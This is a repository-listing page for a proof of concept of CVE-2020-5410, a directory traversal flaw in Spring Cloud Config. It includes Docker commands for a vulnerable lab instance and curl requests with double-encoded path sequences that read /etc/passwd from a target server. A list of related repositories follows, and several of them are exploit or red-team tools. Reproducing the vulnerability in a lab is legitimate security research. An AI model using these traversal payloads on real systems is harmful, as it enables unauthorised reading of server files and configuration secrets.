Home / Java / Security

CVE-2020-5410 Spring Cloud Config directory traversal vulnerability

CVE-2020-5410 Spring Cloud Config directory traversal vulnerability
Information
Category: Java / Security
Watchers: 2
Star: 11
Fork: 2
Last update: Jun 19, 2020
Resource links
https://github.com/osamahamad/CVE-2020-5410-POC

CVE-2020-5410 Spring Cloud Config directory traversal vulnerability

Vulnerability description

Spring Cloud Config, version 2.2.x before 2.2.3, version 2.1.x before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.

Analysis

https://xz.aliyun.com/t/7877

Vulnerable Docker Install

Install any of the vulnerable versions https://hub.docker.com/r/hyness/spring-cloud-config-server/tags

docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE

docker run -it --name=spring-cloud-config-server \
-p 8888:8888 \
hyness/spring-cloud-config-server:2.1.6.RELEASE \
--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo

PoC

curl "vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"


curl "127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

/etc/passwd content in response for educational purposes only :) .

Contents

    spring-projects Spring Framework
    knqyf263 DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
    Vulnmachines CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.
    SecCoder-Security-Lab Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053
    kingbbode spring boot support for automatically loading custom yaml file.
    MrCl0wnLab Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
    chipik PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
    bezkoder Spring Boot & MongoDB Login and Registration example with JWT, Spring Security, Spring Data MongoDB
    herwonowr ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)
    kbastani An example project that demonstrates an end-to-end cloud native application using Spring Cloud for building a practical microservices architecture.
    mploed Example Application to demo various flavours of handling domain events in Spring Boot
    bezkoder Spring Boot Login and Registration example with MySQL, JWT, Rest Api - Spring Boot Spring Security Login example
    dorkerdevil Directory Traversal in Afterlogic webmail aurora and pro
    skmendez Traversal of tree-sitter Trees and any arbitrary tree with a TreeCursor-like interface
    zhzyker Vulmap - Vulnerability scanning and verification tools
    ZecOps SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner
    dunderhay F5 Big-IP CVE-2020-5902 - LFI and RCE
    sqshq Microservice Architecture with Spring Boot, Spring Cloud and Docker
    sqshq Microservice Architecture with Spring Boot, Spring Cloud and Docker
    spring-petclinic Distributed version of Spring Petclinic built with Spring Cloud
    twseptian Spring Boot Log4j - CVE-2021-44228 Docker Lab
    Share this repo

    Related Repos


    Security
    7
    JavaPassDump
    corener JavaPassDump 背景: 红队实战中,有遇到数据库的配置信息加密的情况,有些甚至在Native层处理加解密,为简化红队流程,产生一个通用的数据库信息提取工具:JavaPassDump。
     
    Security
    14
    Avoid the NEXT Log4Shell vulnerability!
    gredler A Java agent that disables features you don't use, before an attacker uses them against you.
     
    Security
    4
    JNDIExploit v1.2
    IR0DayToday # JNDIExploit JNDIExploit v1.2 JNDIExploit v1.2 here can u downoad direct from this git Direct Download for linux wget https://download1320.mediafire
     
    Security
    191
    Burpsuite extension for log4j2rce
    tangxiaofeng7 BurpLog4j2Scan Description BurpLog4j2Scan is a Burp Suite Extension written in JAVA which could be useful as scan log4j2rce. Screenshot start scan pro
     
    Security
    845
    SonarSource Static Analyzer for Java Code Quality and Security
    SonarSource Code Quality and Security for Java This SonarSource project is a code analyzer for Java projects. Information about the analysis of Java features is a
     
    Security
    280
    Log4j2 RCE Passive Scanner plugin for BurpSuite
    whwlsfb Log4j2 RCE Passive Scanner plugin for BurpSuite
     
    Security
    2.1k
    Log4j impact manufacturers and components summary from the Internet community
    YfryTchsGD Log4j impact manufacturers and components summary from the Internet community. Welcome everyone to submit mr to perfect the possible influence surface.
     
    Security
    980
    Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
    christophetd Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
     
    Security
    38
    A automatic bypass 403 Burpsuite plugin
    p0desta AutoBypass403-BurpSuite A burpsuite plugin help me automatic bypass 403. ChangeLog 2021-12-04 support multi-threaded concurrency 2021-12-02 First publ
     
    Security
    219
    Password strength estimator
    GoSimpleLLC Nbvcxz - Password strength estimator - [] nbvcxz is java library (and standalone console program) which is heavily inspired by the work in zxcvbn. Pas
     
    Security
    3
    Keeps LetsEncrypt certificates up-to-date for your Spring Boot Web application
    valb3r Keeps LetsEncrypt certificates up-to-date for your Spring Boot Web application. Pure Java in a single file of library code. An automated embedded alternative to Certbot and docker-sidecars. No JVM restart is needed on certificate update.
     
    Security
    1.1k
    This project aims to deobfuscate most commercially-available obfuscators for Java.
    java-deobfuscator This project aims to deobfuscate most commercially-available obfuscators for Java.
     
    Security
    1.2k
    CFR - Another Java Decompiler \o/
    leibnitz27 This is the public repository for the CFR Java decompiler
     
    Security
    31
    Test-Driven Security
    eleftherias Test-Driven Security Run tests ./gradlew test References Spring Security test support https://docs.spring.io/spring-security/site/docs/current/referen
     
    Security
    255
    FIDO2(WebAuthn) server officially certified by FIDO Alliance and Relying Party examples.
    line FIDO (Fast IDentity Online) is an open standard for online authentication. It is designed to solve the password problems stemming from a lot of security problems as we are suffering today.